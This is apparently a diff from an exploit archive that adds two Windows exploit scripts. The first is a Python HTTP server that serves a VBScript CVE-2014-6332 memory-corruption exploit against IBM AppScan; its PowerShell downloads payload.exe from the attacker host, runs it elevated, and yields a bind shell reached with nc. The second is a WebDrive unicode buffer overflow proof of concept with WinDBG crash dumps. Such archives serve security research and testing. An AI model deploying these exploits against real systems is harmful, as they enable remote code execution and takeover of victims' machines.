typedef NTSTATUS ( WINAPI *_ZwQuerySystemInformation ) (
_In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
_Inout_ PVOID SystemInformation,
_In_ ULONG SystemInformationLength,
_Out_opt_ PULONG ReturnLength
);
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
HANDLE Section;
PVOID MappedBase;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
#define ID_TIMER 0x1
#define WM_SYSTIMER 0x118
// EOF

239
platforms/windows/remote/37163.py Executable file
View file

@ -0,0 +1,239 @@
#!/usr/bin/python
import BaseHTTPServer, socket
##
# IBM Security AppScan Standard OLE Automation Array Remote Code Execution
#
# Author: Naser Farhadi
# Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
#
# Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7
#
# Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/
# if you able to exploit IE then you can exploit appscan and acunetix ;)
# This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And
# Metasploit windows/shell_bind_tcp Executable Payload
#
# Usage:
# chmod +x appscan.py
# ./appscan.py
# ...
# nc 172.20.10.14 333
#
# Video: http://youtu.be/hPs1zQaBLMU
##
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(req):
req.send_response(200)
if req.path == "/payload.exe":
req.send_header('Content-type', 'application/exe')
req.end_headers()
exe = open("payload.exe", 'rb')
req.wfile.write(exe.read())
exe.close()
else:
req.send_header('Content-type', 'text/html')
req.end_headers()
req.wfile.write("""Please scan me!
<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/payload.exe',\
'payload.exe');$(New-Object -com Shell.Application).ShellExecute('payload.exe');"
shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0
end function
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Begin()
function Begin()
On Error Resume Next
info=Navigator.UserAgent
if(instr(info,"Win64")>0) then
exit function
end if
if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function
end if
win9x=0
BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function
function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function
function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
' document.write(i)
Create=True
Exit For
End If
Next
end function
sub testaa()
end sub
function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)
ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314
aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function
function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i+8)
i=readmemo(i+16)
j=readmemo(i+&h134)
for k=0 to &h60 step 4
j=readmemo(i+&h120+k)
if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4)
redim Preserve aa(a0)
j=0
j=readmemo(i+&h120+k)
Exit for
end if
next
ab(2)=1.69759663316747E-313
runmumaa()
end function
function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000
redim Preserve aa(a0)
redim ab(a0)
redim Preserve aa(a2)
type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10
If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function
end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if
If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If
redim Preserve aa(a0)
end function
function ReadMemo(add)
On Error Resume Next
redim Preserve aa(a2)
ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))
ab(0)=0
redim Preserve aa(a0)
end function
</script>""")
if __name__ == '__main__':
sclass = BaseHTTPServer.HTTPServer
server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
print "Http server started", socket.gethostbyname(socket.gethostname()), 80
try:
server.serve_forever()
except KeyboardInterrupt:
pass
server.server_close()

157
platforms/windows/remote/37165.py Executable file
View file

@ -0,0 +1,157 @@
#!/usr/bin/python
#Exploit Title:WebDrive Buffer OverFlow PoC
#Author: metacom
#Vendor Homepage: http://www.webdrive.com/products/webdrive/
#Software Link: https://www.webdrive.com/products/webdrive/download/
#Version: 12.2 (build # 4172) 32 bit
#Date found: 31.05.2015
#Date published: 31.05.2015
#Platform: Windows 7 Ultimate
#Bug: Multiple Buffer Overflow UNICODE
'''
----------------------------------------------------------------------------
Summary:
Unlike a typical FTP client, WebDrive allows you to open and
edit server-based, files without the additional step of downloading the file.
Using a simple wizard, you assign a network drive letter to the FTP Server.
WebDrive supports additional protocols such as WebDAV, SFTP and Amazon S3 and
maps a drive letter to each of these servers.You can map unique drive letters
to multiple servers.Download the full-function 20-day trial of WebDrive and
make file management on remote servers easier and more efficient!
------------------------------------------------------------------------------
WebDrive connects to many types of web servers,
as well as servers in the cloud.You can use WebDrive
to access your files on all of the following server
types and protocols:
WebDAV ------------>Vulnerable
WebDAV over SSL---->Vulnerable
FTP---------------->Vulnerable
FTP over SSL------->Vulnerable
Amazon S3---------->Vulnerable
SFTP--------------->Vulnerable
FrontPage Server--->Vulnerable
------------------------------------------------------------------------------
How to Crash:
Copy the AAAA...string from WebDrive.txt to clipboard, create a connection
and paste it in the URL/Address and attempt to connect.
WebDAV
============================
Crash Analysis using WinDBG:
============================
(430.9f8): Access violation - code c0000005 (!!! second chance !!!)
eax=001cad5c ebx=02283af8 ecx=00000041 edx=02289d9c esi=fdf47264 edi=001cad5c
eip=0055ff2b esp=001c8cfc ebp=001c8d00 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe
webdrive+0x30ff2b:
0055ff2b 66890c16 mov word ptr [esi+edx],cx ds:0023:001d1000=????
0:000> !exchain
001c8d20: webdrive+35a24e (005aa24e)
001cb768: webdrive+1c0041 (00410041)
Invalid exception stack at 00410041
0:000> d 001cb768
001cb768 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001cb778 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001cb788 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001cb798 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001cb7a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001cb7b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001cb7c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001cb7d8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
WebDAV over SSL
============================
Crash Analysis using WinDBG:
============================
(b88.ca0): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=00410041 edx=775e660d esi=00000000 edi=00000000
eip=00410041 esp=000a1238 ebp=000a1258 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\ipworks9.dll -
ipworks9!IPWorks_SNPP_Get+0x57f:
00410041 038d4df0e8da add ecx,dword ptr [ebp-25170FB3h] ss:0023:daf302a5=????????
0:000>!exchain
Invalid exception stack at 00410041
FTP and FTP over SSL
============================
Crash Analysis using WinDBG:
============================
(834.70c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002d84f0 edi=00000000
eip=775e64f4 esp=002d8488 ebp=002d84dc iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
ntdll!KiFastSystemCallRet:
775e64f4 c3 ret
0:000> !exchain
002d8c1c: webdrive+35a24e (015da24e)
002db664: 00410041
Invalid exception stack at 00410041
Amazon S3
============================
Crash Analysis using WinDBG:
============================
(a64.a98): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002f8550 edi=00000000
eip=775e64f4 esp=002f84e8 ebp=002f853c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
ntdll!KiFastSystemCallRet:
775e64f4 c3 ret
0:000> !exchain
002f8c7c: webdrive+35a24e (015da24e)
002fb6c4: 00410041
Invalid exception stack at 00410041
SFTP
============================
Crash Analysis using WinDBG:
============================
(848.9a8): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002380f8 edi=00000000
eip=775e64f4 esp=00238090 ebp=002380e4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
ntdll!KiFastSystemCallRet:
775e64f4 c3 ret
0:000> !exchain
00238824: webdrive+35a24e (015da24e)
0023b26c: 00410041
Invalid exception stack at 00410041
FrontPage Server
============================
Crash Analysis using WinDBG:
============================
(cd4.710): Access violation - code c0000005 (!!! second chance !!!)
eax=007ba9f0 ebx=05d29738 ecx=00000041 edx=05d2fd48 esi=faa912b8 edi=007ba9f0
eip=003bff2b esp=007b8990 ebp=007b8994 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe
webdrive+0x30ff2b:
003bff2b 66890c16 mov word ptr [esi+edx],cx ds:0023:007c1000=????
0:000> !exchain
007b89b4: webdrive+35a24e (0040a24e)
007bb3fc: webdrive+360041 (00410041)
Invalid exception stack at 00410041
'''
#Proof of Concept:
buffer="http://"
buffer+="\x41" * 70000
off=buffer
try:
out_file = open("WebDrive.txt",'w')
out_file.write(off)
out_file.close()
print("[*] Malicious txt file created successfully")
except:
print "[!] Error creating file"